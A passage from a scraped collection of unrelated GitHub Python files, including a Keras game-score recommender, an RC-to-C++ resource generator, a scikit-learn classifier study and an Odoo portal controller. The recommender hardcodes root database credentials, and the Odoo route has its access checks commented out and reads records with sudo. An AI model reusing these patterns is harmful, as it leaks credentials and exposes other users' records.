create_engine\r\nimport pymysql\r\n\r\n\r\n\r\nk=128\r\n#数据预处理,将原始数据划分为6个等级\r\npymysql.install_as_MySQLdb()\r\nengine = create_engine(\r\n 'mysql+mysqldb://root:root@192.168.10.14:3306/com66nao_cloud?charset=utf8')\r\ndf4 = pd.read_sql('select user_id as user_truename,train_score as score ,cogn_task.name as name ,cloud_cat.name as firstbrain from user_train_history join cogn_task on cogn_task.id=user_train_history.game_id join cloud_cat on cloud_cat.id=cogn_task.label', engine)\r\ndf1 = df4[['user_truename', 'name', 'score']] # 只选取有实际作用的列\r\n#因为在线数据库中有的游戏其实应该是没有上线,一切数值均为0,不应该被纳入考虑,因而删除空值\r\ndf5 = df1 [df1>0]\r\ndf6 = df5.dropna()\r\ngrouped = df6['score'].groupby([df6['user_truename'], df6['name']])\r\ndf2 = grouped.median()\r\ndf3 = df2.reset_index()\r\n\r\n\r\nold_set=np.unique(df3['user_truename'])\r\nold_list=list(old_set)\r\nnew_id=np.arange(len(old_list))\r\ndf3['new_id']=df3['user_truename'].replace(old_list,new_id)\r\ndf3['new_id']=df3['new_id']+1\r\n\r\nprint('OK')\r\n\r\nold_gameset = np.unique(df3['name'])\r\nold_gamelist = list(old_gameset)\r\nfid = np.arange(len(old_gamelist))\r\ndf3['fid'] = df3['name'].replace(old_gamelist,fid)\r\ndf3['fid'] = df3['fid']+1\r\n\r\n\r\nprint(\"ok\")\r\nprint('ik')\r\n\r\n\r\ntables1 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - np.min(x)) * 0.90)[\"score\"]\r\ntables2 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - np.min(x)) * 0.70)[\"score\"]\r\ntables3 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - np.min(x)) * 0.50)[\"score\"]\r\ntables4 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - np.min(x)) * 0.30)[\"score\"]\r\ntables5 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - 
np.min(x)) * 0.10)[\"score\"]\r\ntotal_score = pd.DataFrame([tables1, tables2, tables3, tables4, tables5])\r\nfinal_score = total_score.T\r\n\r\nfinal_score.columns = ['a', 'b', 'c', 'd', 'e']\r\n\r\nfinal_score[\"fid\"] = final_score.index\r\n\r\nscore_table = pd.merge(final_score, df3, on=\"fid\")\r\nprint(\"ok\")\r\nscore_table.loc[(score_table[\"score\"] < score_table['e']), 'score'] = 6 #\r\nscore_table.loc[(score_table[\"score\"] >= score_table['e']) & (score_table[\"score\"] < score_table['d']), 'score'] = 5\r\nscore_table.loc[(score_table[\"score\"] >= score_table['d']) & (score_table[\"score\"] < score_table['c']), 'score'] = 4\r\nscore_table.loc[(score_table[\"score\"] >= score_table['c']) & (score_table[\"score\"] < score_table['b']), 'score'] = 3\r\nscore_table.loc[(score_table[\"score\"] >= score_table['b']) & (score_table[\"score\"] < score_table['a']), 'score'] = 2\r\nscore_table.loc[(score_table[\"score\"] >= score_table['a']), 'score'] = 1  # discretize all the scores into the levels\r\nscore_table = score_table[['new_id', 'fid', 'score']]  # keep only the columns that are actually useful\r\n# end of data loading\r\n\r\n\r\n\r\nscore_table.to_csv('E:/lf/score_table.csv',index = None)\r\n\r\nn_users=np.max(score_table['new_id'])\r\nn_movices=int(np.max(score_table['fid']))\r\nprint([n_users,n_movices,len(score_table)])\r\nscore_table.to_csv('E:/scoretable.csv',index = None)\r\nmodel1=Sequential()\r\nmodel1.add(Embedding(n_users+1,k,input_length=1))\r\nmodel1.add(Reshape((k,)))\r\nmodel2=Sequential()\r\nmodel2.add(Embedding(n_movices+1,k,input_length=1))\r\nmodel2.add(Reshape((k,)))\r\nmodel=Sequential()\r\nmodel.add(Merge([model1,model2],mode='concat'))# then add Dropout and relu non-linear transformations to build a multi-layer deep model.\r\n#model.add(Concatenate([model1, model2]))\r\n#x = concatenate([a, b], axis=-1)\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(k, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(int(k / 4), activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(int(k / 16), activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(6, activation = 'softmax'))# since the rating being predicted was a continuous variable, the last layer originally applied a linear transformation directly\r\nmodel.compile(loss='categorical_crossentropy',optimizer='adam')\r\n\r\n\r\n\r\n\r\nusers=score_table['new_id'].values\r\nmovices=score_table['fid'].values\r\ny=score_table['score'].values\r\n\r\nfrom keras.utils import np_utils\r\nnb_classes = 6\r\ny_train = np_utils.to_categorical(y, nb_classes)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train_users, x_test_users,x_train_movices, x_test_movices,y_train, y_test = train_test_split(users, movices, y,test_size=0.2, random_state=None)\r\nx_train = [x_train_users,x_train_movices]\r\nx_test = [x_test_users,x_test_movices]\r\nx = [users,movices]\r\nmodel.fit(x_train,y_train,batch_size=100,epochs=10)\r\n\r\n\r\nprint(\"training is start\")\r\nmodel.save_weights('model629.h5')\r\njson_string = model.to_json()\r\nwith open(\"model629.json\", \"w\") as json_file:\r\n    json_file.write(json_string)\r\n\r\n\r\n\r\n\r\ntraincost = model.evaluate(x_train,y_train)\r\nprint('traincost:',traincost)\r\n\r\ntestcost = model.evaluate(x_test,y_test)\r\nprint('testcost:',testcost)\r\n\r\nallcost = model.evaluate(x,y)\r\nprint('allcost:',allcost)\r\n\r\n\r\n# this is the overall mean squared error, not the mean squared error on the test set\r\nsum =0\r\npredictions = []\r\nfor i in range(score_table.shape[0]):\r\n    predictions.append(model.predict([np.array([score_table['new_id'][i]]), np.array([score_table['fid'][i]])]))\r\n    sum += (score_table['score'][i] - model.predict([np.array([score_table['new_id'][i]]), np.array([score_table['fid'][i]])])) ** 2\r\nmse = 
math.sqrt(sum/score_table.shape[0])\r\nprint(\"Hand-computed mean squared error is\",mse)\r\n\r\n\r\npred1 = model.predict([np.array([10]),np.array([1])])\r\nprint('[11,1] predicted value:',[np.array([10]),np.array([1])],' ',pred1)\r\n\r\npred2 = model.predict([np.array([score_table['new_id'][0]]), np.array([score_table['fid'][0]])])\r\nprint('[11,1] predicted value:',[np.array([10]),np.array([1])],' ',pred2)\r\n\r\npred3 = model.predict([np.array([users[10]]),np.array([movices[1]])])\r\nprint('[11,1] predicted value:',[np.array([10]),np.array([1])],' ',pred3)\r\n\r\npd_predictions = pd.Series(predictions)\r\npd_predictions.to_csv('E:/lf/pd_predictions.csv',index = None)\r\n\r\nprint('ok')\r\n\r\n","repo_name":"zhuanglichun/LIULIUNAO","sub_path":"tensorflow_deep_copy629.py","file_name":"tensorflow_deep_copy629.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"7014734325","text":"#!/usr/bin/python3\n\nfrom sys import argv\nfrom os.path import exists\n\nstr_table = []\ntext = []\ndefs = []\n\n\ndef parseRC(rcFile):\n    ret_incl = []\n    with open(rcFile, 'r', encoding='utf-8') as f:\n        cur_lst = None\n        str_id = None\n        txt = None\n        for ln in f.readlines():\n            if ln.lower().startswith(u'#include'):\n                n = ln.split('\"')\n                ret_incl.append(n[1].replace(u'\\\\', u'/'))\n            if u'stringtable' in ln.lower():\n                cur_lst = str_table\n            if u'end' == ln.lower():\n                cur_lst = None\n            if ln.startswith(u' ') and cur_lst is not None:\n                n = ln.strip(u'\\n').split(u'\"')\n                if str_id is None:\n                    str_id = n[0].strip()\n                if len(n) == 1:\n                    continue\n                txt = u'\"'.join(n[1:-1])\n                cur_lst.append((str_id, txt))\n                str_id = None\n                txt = None\n    return ret_incl\n\n\ndef parseH(hFile):\n    try:\n        with open(hFile, u'r') as h:\n            for line in h.readlines():\n                defs.append(line.strip(u'\\n'))\n    except Exception:\n        pass\n\n\ndef getIncludes(base, paths, includes):\n    ret_incl = []\n    # fetching includes and dropping them directly into the generated file\n    for i in includes[:]:\n        inc = u''\n        for p in paths:\n            if exists(u'/'.join([base, p, i])):\n                inc = u'/'.join([base, p, i])\n                break\n            if exists(u'/'.join([p, i])):\n                inc = u'/'.join([p, i])\n                break\n        if exists(u'/'.join([base, i])):\n            inc = u'/'.join([base, i])\n        if len(inc) < 1:\n            notice(u'not found: {0}'.format(i))\n            continue\n        if u'.h' in i.lower():\n            notice(u'including: {0}'.format(inc))\n            parseH(inc)\n        if u'.rc' in i.lower():\n            notice(u'including: {0}'.format(inc))\n            ret_incl.extend(parseRC(inc))\n    return ret_incl\n\n\ndef notice(msg):\n    global verbose\n    if verbose:\n        print(msg)\n\n\nverbose = False\nmain_rc = u''\npaths = [u'.']\nfor p in argv:\n    if '-v' in p:\n        verbose = True\n    if p.lower().endswith(u'rc'):\n        main_rc = p\n        continue\n    paths.append(p)\n\nbase = u'/'.join(main_rc.split('/')[:-1])\n\nincludes = parseRC(main_rc)\nwhile len(includes) > 0:\n    includes = getIncludes(base, paths, includes[:])\n\n\nwith open(main_rc.split(u'/')[-1] + u'.cpp', 'w', encoding='utf-8') as o:\n    o.write(u'''/*\n  my template c++ file which implements the internal resource\n  lookup and storage\n*/\n\n#include \"dynres.h\"\n#include <string>\n#include <cinttypes>\n#include <utility>\n#include <algorithm>\n#include <vector>\n''')\n    for i in defs:\n        o.write(u'{0}'.format(i)+'\\n')\n    o.write('''\n\nstd::vector<std::pair<uint32_t,const char*>> str_tab {\n''')\n    for x in str_table:\n        o.write(u'    std::make_pair({0},\"{1}\"),\\n'.format(x[0], x[1]))\n    o.write(u'''    std::make_pair(1,\"generated by LithTech Resource compiler\\\\n\\\\n\" \\\\\n    \"2018 (c) Rene 'Katana Steel' 
Kjellerup, distributed under the terms\" \\\\\n \" of\\\\nthe GNU General Public Licenses version 3 or later for details\" \\\\\n \" see:\\\\nhttp://www.gnu.org/licenses/gpl.html\\\\n\")\n};\n\nextern \"C\" {\n const char* LoadString(uint32_t id)\n {\n auto res = std::find_if(str_tab.begin(),\n str_tab.end(),\n [id](std::pair<uint32_t, const char*> x){\n return (x.first == id);\n });\n if(res != str_tab.end())\n return res->second;\n else\n return nullptr;\n }\n}\n\nvoid setup_cursors() { }\n\nvoid setup_string_tables() {\n bool c = false;\n for(auto&& p : str_tab)\n c = (LoadString(p.first) == p.second);\n}\n''')\n","repo_name":"leoschur/lithtech","sub_path":"libs/DynRes/rc.parser.py","file_name":"rc.parser.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"38434620277","text":"from kivymd.app import MDApp\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom kivymd.uix.list import OneLineListItem\r\nfrom kivymd.uix.toolbar import MDToolbar\r\nfrom kivymd.uix.dialog import MDDialog\r\nclass MainApp(MDApp):\r\n\tdef build(self):\r\n\t\tself.theme_cls.primary_palette = \"Blue\"\r\n\r\n\tdef on_start(self):\r\n\t\turl = \"http://www.times.co.sz\"\r\n\t\tresponse = requests.get(url)\r\n\r\n\t\tsoup = BeautifulSoup(response.content, 'html5lib')\r\n\t\theadlines = []\r\n\r\n\t\ttable = soup.find('div', attrs = {'id':'more_news_index'})\r\n\t\tfor row in table.findAll('h2'):\r\n\t\t\ttemp = row.text\r\n\t\t\theadlines.append(temp)\r\n\t\t\r\n\t\tfor headline in headlines:\r\n\t\t\tself.root.ids.container.add_widget(\r\n\t\t\t\tOneLineListItem(text=headline,))\r\n\r\n\t\r\n\t\t\t\t\r\nMainApp().run()","repo_name":"Lazarus78534396/ekuseni","sub_path":"HeadlinesApp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14383653151","text":"from sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import RobustScaler\r\nimport numpy as np\r\n\r\nimport pandas as pd\r\nimport os\r\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score, f1_score, confusion_matrix, \\\r\n matthews_corrcoef, accuracy_score, roc_curve, auc, roc_auc_score\r\nfrom sklearn.model_selection import train_test_split, KFold, train_test_split, train_test_split\r\n\r\nfrom sklearn.preprocessing import LabelEncoder, LabelBinarizer\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.ensemble import AdaBoostClassifier, BaggingClassifier, GradientBoostingClassifier, \\\r\n GradientBoostingClassifier, VotingClassifier, RandomForestClassifier\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.naive_bayes import GaussianNB\r\nimport random\r\nimport glob\r\n\r\nclass MisClassify():\r\n def __init__(self):\r\n self.evaluationName = ['Precision', 'F1Score', 'Accuracy', 'Recall', 'Matt', 'Auc']\r\n self.run_times = 100\r\n self.threshould = 90\r\n\r\n def multiclass_roc_auc_score(self, y_test, y_pred, average=\"macro\"):\r\n lb = LabelBinarizer()\r\n lb.fit(y_test)\r\n y_test = lb.transform(y_test)\r\n y_pred = lb.transform(y_pred)\r\n return roc_auc_score(y_test, y_pred, average=average)\r\n\r\n def misClassifyFrequency(self, ytest, ypred, idx):\r\n mis = []\r\n for i in range(len(ytest)):\r\n if 
(ytest[i] != ypred[i]):\r\n mis.append(idx[i])\r\n return mis\r\n\r\n def doClassify(self, X, y, classifier, nfold=10):\r\n Data = X\r\n misclassify = np.zeros(len(y))\r\n evlP = np.zeros((10,6))\r\n k = 0\r\n kf = KFold(n_splits=nfold, shuffle=True, random_state=random.randint(1, 100))\r\n for train_index, test_index in kf.split(Data):\r\n classifier.fit(Data[train_index], y[train_index])\r\n y_pred = classifier.predict(Data[test_index])\r\n y_test = y[test_index]\r\n\r\n evlP[k][0] = (precision_score(y_test, y_pred, average='micro'))\r\n evlP[k][1] = (f1_score(y_test, y_pred, average='macro'))\r\n evlP[k][2] = (accuracy_score(y_test, y_pred))\r\n evlP[k][3] = (recall_score(y_test, y_pred, average=\"weighted\"))\r\n evlP[k][4] = (matthews_corrcoef(y_test, y_pred))\r\n evlP[k][5] = self.multiclass_roc_auc_score(y_test, y_pred)\r\n # evlP[k][5]= 0\r\n\r\n # cm = confusion_matrix(y_test, y_pred)\r\n k += 1\r\n mis = self.misClassifyFrequency(y_test, y_pred, test_index)\r\n for item in mis:\r\n misclassify[item] += 1\r\n\r\n average = evlP.mean(axis=0)\r\n average = np.squeeze(np.asarray(average))\r\n modelparams = pd.DataFrame({'Evaluating Function': self.evaluationName, 'Values': average})\r\n return modelparams, misclassify\r\n\r\n def applyModel(self, X, y, model):\r\n misclassify = []\r\n for i in range(len(y)):\r\n misclassify.append(0)\r\n\r\n for i in range(self.run_times):\r\n params, mis = self.doClassify(X, y, model)\r\n for i, item in enumerate(mis):\r\n if (item >= 1):\r\n misclassify[i] += 1\r\n\r\n return misclassify\r\n\r\n def RemoveMisAndRunClassify(self, dataframe, model, miss ):\r\n ncol = dataframe.values.shape[1]\r\n rawdata = np.array(dataframe.to_numpy())\r\n y = rawdata[:, ncol - 1]\r\n y = y.astype(np.float)\r\n selIndex = []\r\n for i, item in enumerate(miss):\r\n if (item < self.threshould):\r\n selIndex.append(i)\r\n X = rawdata[selIndex, 1:ncol - 1]\r\n X = X.astype(np.float)\r\n y = rawdata[selIndex, ncol - 1]\r\n y = y.astype(np.float)\r\n X = StandardScaler().fit_transform(X)\r\n evalP = np.zeros((100,6))\r\n\r\n for i in range(100):\r\n r0 ,mismis = obj.doClassify(X, y, model)\r\n evalP[i,:] = r0.to_numpy()[:, 1]\r\n\r\n evalP = evalP.mean(axis=0)\r\n\r\n return evalP\r\n\r\n def RemoveCorrelated(self, dataframe):\r\n corr_matrix = dataframe.corr().abs()\r\n upper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool))\r\n to_drop = {}\r\n for i in range(upper.values.shape[0]):\r\n for j in range(i + 1, upper.values.shape[0]):\r\n if upper.values[i, j] >= 0.50:\r\n to_drop[upper.columns[j]] = 1\r\n\r\n uncorrelated_data = dataframe.drop(to_drop.keys(), axis=1)\r\n return uncorrelated_data\r\n\r\n def FindIndex(self, missing, thresuld):\r\n indexes = []\r\n for i, item in enumerate(missing):\r\n if (item > thresuld):\r\n indexes.append(i)\r\n return indexes\r\n def MakeModel(self):\r\n ada = AdaBoostClassifier(n_estimators=100, base_estimator=None, learning_rate=1, random_state=1)\r\n knn = KNeighborsClassifier(n_neighbors=5, metric='euclidean')\r\n nivebase = GaussianNB()\r\n dt = DecisionTreeClassifier(criterion=\"gini\", random_state=100, max_depth=3, min_samples_leaf=5)\r\n lg = LogisticRegression(random_state=0)\r\n svclassifier = SVC(kernel='rbf')\r\n randomforest = RandomForestClassifier(n_estimators=10) # Train the model on training data\r\n mlp = MLPClassifier(hidden_layer_sizes=(20, 3), max_iter=150, alpha=1e-4, solver='sgd', verbose=10, tol=1e-4,\r\n random_state=1, learning_rate_init=.1)\r\n return 
ada,knn,nivebase,dt,lg,svclassifier,randomforest,mlp;\r\n def ReadExcelFile(self, filename, sheetname):\r\n dataframe = pd.read_excel(io=filename, sheet_name=sheetname)\r\n uncorrelated = self.RemoveCorrelated(dataframe)\r\n # nrow = uncorrelated.values.shape[0]\r\n # colheader = list(uncorrelated.columns.values)\r\n # PID = rawdata[:, 0]\r\n\r\n ncol = uncorrelated.values.shape[1]\r\n rawdata = np.array(uncorrelated.to_numpy())\r\n X = rawdata[:, 1:ncol - 1]\r\n X = X.astype(np.float)\r\n y = rawdata[:, ncol - 1]\r\n y = y.astype(np.float)\r\n X = RobustScaler().fit_transform(X)\r\n return X, y\r\n def ApplyAllMissing(self, path):\r\n onlyfiles = glob.glob(path)\r\n totalAUC = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalACC = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalRecall = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalPrecision = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalf1 = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n totalmatt = pd.DataFrame(\r\n {'Features': [''], 'Ada': [0], 'Knn': [0], 'NB': [0], 'DT': [0], 'LR': [0], 'SVM': [0], 'RF': [0],\r\n 'MLP': [0]})\r\n for i, item in enumerate(onlyfiles):\r\n sheetname = os.path.basename(item).split('.')[0]\r\n print('processing {}'.format(sheetname))\r\n dataframe = pd.read_excel(io=item, sheet_name=\"Sheet1\")\r\n uncorrelated = self.RemoveCorrelated(dataframe)\r\n nrow = uncorrelated.values.shape[0]\r\n ncol = uncorrelated.values.shape[1]\r\n colheader = list(uncorrelated.columns.values)\r\n rawdata = np.array(uncorrelated.to_numpy())\r\n PID = rawdata[:, 0]\r\n X = rawdata[:, 1:ncol - 1]\r\n X = X.astype(np.float)\r\n y = rawdata[:, ncol - 1]\r\n y = y.astype(np.float)\r\n X = StandardScaler().fit_transform(X)\r\n\r\n try:\r\n ada, knn, nivebase, dt, lg, svclassifier, randomforest, mlp = self.MakeModel()\r\n\r\n misada = obj.applyModel(X, y, ada)\r\n misknn = obj.applyModel(X, y, knn)\r\n misnb = obj.applyModel(X, y, nivebase)\r\n misdt = obj.applyModel(X, y, dt)\r\n mislg = obj.applyModel(X, y, lg)\r\n missvm = obj.applyModel(X, y, svclassifier)\r\n misrf = obj.applyModel(X, y, randomforest)\r\n mismlp = obj.applyModel(X, y, mlp)\r\n\r\n\r\n #r0 = obj.RemoveMisAndRunClassify(uncorrelated, ada, misada)\r\n r1 = obj.RemoveMisAndRunClassify(uncorrelated, knn, misknn)\r\n r2 = obj.RemoveMisAndRunClassify(uncorrelated, nivebase, misnb)\r\n r3 = obj.RemoveMisAndRunClassify(uncorrelated, dt, misdt)\r\n r4 = obj.RemoveMisAndRunClassify(uncorrelated, lg, mislg)\r\n r5 = obj.RemoveMisAndRunClassify(uncorrelated, svclassifier, missvm)\r\n r6 = obj.RemoveMisAndRunClassify(uncorrelated, randomforest, misrf)\r\n #r7 = obj.RemoveMisAndRunClassify(uncorrelated, mlp, mismlp)\r\n\r\n result = pd.DataFrame({'Evaluating Function': self.evaluationName,\r\n 'Ada': r1,\r\n 'KNN': r1,\r\n 'NB': r2,\r\n 'DT': r3,\r\n 'LR': r4,\r\n 'SVM': r5,\r\n 'RF': r6,\r\n 'MLP': r1})\r\n self.evaluationName = ['Precision', 'F1Score', 'Accuracy', 'Recall', 'Matt', 'Auc']\r\n\r\n totalPrecision.loc[i] = [sheetname] + list(result.values[0, 1:])\r\n totalf1.loc[i] = [sheetname] + 
list(result.values[1, 1:])\r\n totalACC.loc[i] = [sheetname] + list(result.values[2, 1:])\r\n totalRecall.loc[i] = [sheetname] + list(result.values[3, 1:])\r\n totalmatt.loc[i] = [sheetname] + list(result.values[4, 1:])\r\n totalAUC.loc[i] = [sheetname] + list(result.values[5, 1:])\r\n except:\r\n import sys\r\n print(sys.exc_info()[0])\r\n pass\r\n totalPrecision.to_csv(\"Result/totalPrecision.csv\")\r\n totalf1.to_csv(\"Result/totalF1.csv\")\r\n totalACC.to_csv(\"Result/totalACC.csv\")\r\n totalRecall.to_csv(\"Result/totalRecall.csv\")\r\n totalmatt.to_csv(\"Result/totalMatt.csv\")\r\n totalAUC.to_csv(\"Result/totalAUC.csv\")\r\n\r\ncops_proteins = \"TestData/*.xlsx\"\r\nobj = MisClassify()\r\nobj.ApplyAllMissing(cops_proteins)\r\n\r\n\r\n","repo_name":"karimrahimian/moonlight_proteins","sub_path":"RemoveOutliers.py","file_name":"RemoveOutliers.py","file_ext":"py","file_size_in_byte":10965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"19586427937","text":"from odoo import http, _\nfrom odoo.exceptions import AccessError\nfrom odoo.http import request\n\nfrom odoo.addons.website_portal.controllers.main import website_account\n\n\nclass website_account(website_account):\n\n @http.route()\n def account(self, **kw):\n \"\"\" Add sales documents to main account page \"\"\"\n response = super(website_account, self).account(**kw)\n partner = request.env.user.partner_id\n\n StatusScreen = request.env['stewart.status.screen']\n status_screen_count = StatusScreen.search_count([\n ('partner_id', 'in', [partner.commercial_partner_id.id])\n ])\n\n response.qcontext.update({\n 'status_screen_count': status_screen_count,\n })\n return response\n \n @http.route(['/my/screen/<int:screen>'], type='http', auth=\"user\", website=True)\n def status_screen_followup(self, screen, **kw):\n screen = request.env['stewart.status.screen'].browse([screen])\n# try:\n# screen.check_access_rights('read')\n# screen.check_access_rule('read')\n# except AccessError:\n# return request.render(\"website.403\")\n\n screen_sudo = screen.sudo()\n screen_lines = {il.name.id: il.id for il in screen_sudo.mapped('list_of_materials')}\n\n return request.render(\"alex_stewart.status_screen_followup\", {\n 'screen': screen_sudo,\n 'screen_lines': screen_lines,\n })\n \n @http.route(['/my/status_screens', '/my/status_screens/page/<int:page>'], type='http', auth=\"user\", website=True)\n def portal_my_status(self, page=1, date_begin=None, date_end=None, **kw):\n values = self._prepare_portal_layout_values()\n partner = request.env.user.partner_id\n StatusScreen = request.env['stewart.status.screen']\n\n domain = [\n ('partner_id', 'in', [partner.commercial_partner_id.id])\n ]\n archive_groups = self._get_archive_groups('stewart.status.screen', domain)\n if date_begin and date_end:\n domain += [('create_date', '>', date_begin), ('create_date', '<=', date_end)]\n\n # count for pager\n status_count = StatusScreen.search_count(domain)\n # pager\n pager = request.website.pager(\n url=\"/my/status_screens\",\n url_args={'date_begin': date_begin, 'date_end': date_end},\n total=status_count,\n page=page,\n step=self._items_per_page\n )\n # content according to pager and archive selected\n statuses = StatusScreen.search(domain, limit=self._items_per_page, offset=pager['offset'])\n\n values.update({\n 'date': date_begin,\n 'statuses': statuses,\n 'page_name': 'Screen',\n 'pager': pager,\n 'archive_groups': archive_groups,\n 'default_url': '/my/status_screens',\n })\n return 
request.render(\"alex_stewart.portal_my_status_screens\", values)\n\n# \n ","repo_name":"stepanetssergey/alex_stewart","sub_path":"controller/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11746589580","text":"import fileinput\n\ninput_lines = list(fileinput.input())\n\npath = [x.strip() for x in input_lines[0].split(\",\")]\n\nposition = [0, 0]\ndirection = 0\nvisited_positions = [position[:]]\n\nfor step in path:\n turn = step[0]\n length = int(step[1:])\n direction = (direction + (1 if turn == \"R\" else -1)) % 4\n for unit_step in range(length):\n position[direction % 2] += 1 - (direction // 2) * 2\n if position in visited_positions:\n print(sum(abs(i) for i in position))\n exit()\n else:\n visited_positions.append(position[:])\n","repo_name":"gergely-elias/advent_of_code","sub_path":"2016/d01p2.py","file_name":"d01p2.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"69954675513","text":"import numpy as np\nimport scipy.signal\nfrom .utils import check_episode\n\n__all__ = ['spectrogram']\n\n\n# for reference only\ndef _spectrogram_scipy(snd, window=('tukey', 0.25), nperseg=256, noverlap=None,\n nfft=None, detrend='constant', return_onesided=True,\n scaling='density'):# , mode='psd'): # for new scipy\n f, t, Sxx = scipy.signal.spectrogram(x=snd.read_frames(), fs=snd.fs,\n window=window,\n nperseg=nperseg,\n noverlap=noverlap,\n nfft=nfft,\n detrend=detrend,\n return_onesided=return_onesided,\n scaling=scaling, axis=0)# ,\n # mode=mode)\n return f, t, Sxx\n\n\ndef spectrogram(snd, nt=1000, nperseg=512, nfft=None, scaling='density',\n window='hann', startframe=None, endframe=None,\n starttime=None, endtime=None, dtype=np.float64):\n startframe, endframe = check_episode(startframe=startframe,\n endframe=endframe,\n starttime=starttime,\n endtime=endtime,\n fs=snd.fs,\n nframes=snd.nframes)\n nperseg = int(nperseg)\n if nperseg < 1:\n raise ValueError('nperseg must be a positive integer')\n if nfft is None:\n nfft = nperseg\n elif nfft < nperseg:\n raise ValueError('nfft must be greater than or equal to nperseg.')\n else:\n nfft = int(nfft)\n nt = int(nt)\n if nt < 1:\n raise ValueError('nt must be larger than zero.')\n window = scipy.signal.windows.get_window(window, nperseg)\n f = np.fft.rfftfreq(n=nfft, d=1 / float(snd.fs))\n if scaling == 'density':\n scale = 1.0 / (snd.fs * (window * window).sum())\n elif scaling == 'spectrum':\n scale = 1.0 / window.sum() ** 2\n else:\n raise ValueError('Unknown scaling: %r' % scaling)\n input = np.zeros((nfft, nt, snd.nchannels), dtype=dtype)\n starts = np.linspace(startframe, endframe - nperseg, nt, dtype='int64')\n t = (starts.astype('float64') + nperseg / 2.0) / float(snd.fs)\n with snd.open():\n for i, start in enumerate(starts):\n input[:nperseg,i] = snd.read_frames(startframe=start,\n endframe=start + nperseg).astype(dtype)\n input[:nperseg] *= window[:,np.newaxis, np.newaxis]\n v = np.fft.rfft(input, axis=0)\n sg = np.abs(v * v.conjugate()) * scale\n if nfft % 2:\n sg[1:] *= 2\n else:\n # Last point is unpaired Nyquist freq point, don't double\n sg[1:-1] *= 2\n return f, t, 
sg\n\n","repo_name":"gbeckers/soundlab","sub_path":"soundlab/spectrotemporal.py","file_name":"spectrotemporal.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26374102241","text":"import warnings\nfrom collections import OrderedDict\n\nfrom django import VERSION as DJANGO_VERSION\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.admin import FieldListFilter\nfrom django.contrib.admin.options import IncorrectLookupParameters\nfrom django.contrib.admin.utils import (\n get_fields_from_path,\n label_for_field,\n lookup_field,\n prepare_lookup_value,\n quote,\n unquote,\n)\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import (\n FieldDoesNotExist,\n ImproperlyConfigured,\n ObjectDoesNotExist,\n PermissionDenied,\n SuspiciousOperation,\n)\nfrom django.core.paginator import InvalidPage, Paginator\nfrom django.db import models, transaction\nfrom django.db.models.fields.related import ManyToManyField, OneToOneRel\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.template.defaultfilters import filesizeformat\nfrom django.utils.decorators import method_decorator\nfrom django.utils.encoding import force_str\nfrom django.utils.functional import cached_property\nfrom django.utils.html import format_html\nfrom django.utils.http import urlencode\nfrom django.utils.text import capfirst\nfrom django.utils.translation import gettext as _\nfrom django.utils.translation import gettext_lazy\nfrom django.views.generic import TemplateView\nfrom django.views.generic.edit import FormView\nfrom django.views.generic.list import MultipleObjectMixin\n\nfrom wagtail.admin import messages\nfrom wagtail.admin.ui.tables import Column, DateColumn, Table, UserColumn\nfrom wagtail.admin.views.generic.base import WagtailAdminTemplateMixin\nfrom wagtail.admin.views.mixins import SpreadsheetExportMixin\nfrom wagtail.log_actions import log\nfrom wagtail.log_actions import registry as log_registry\nfrom wagtail.models import Locale, 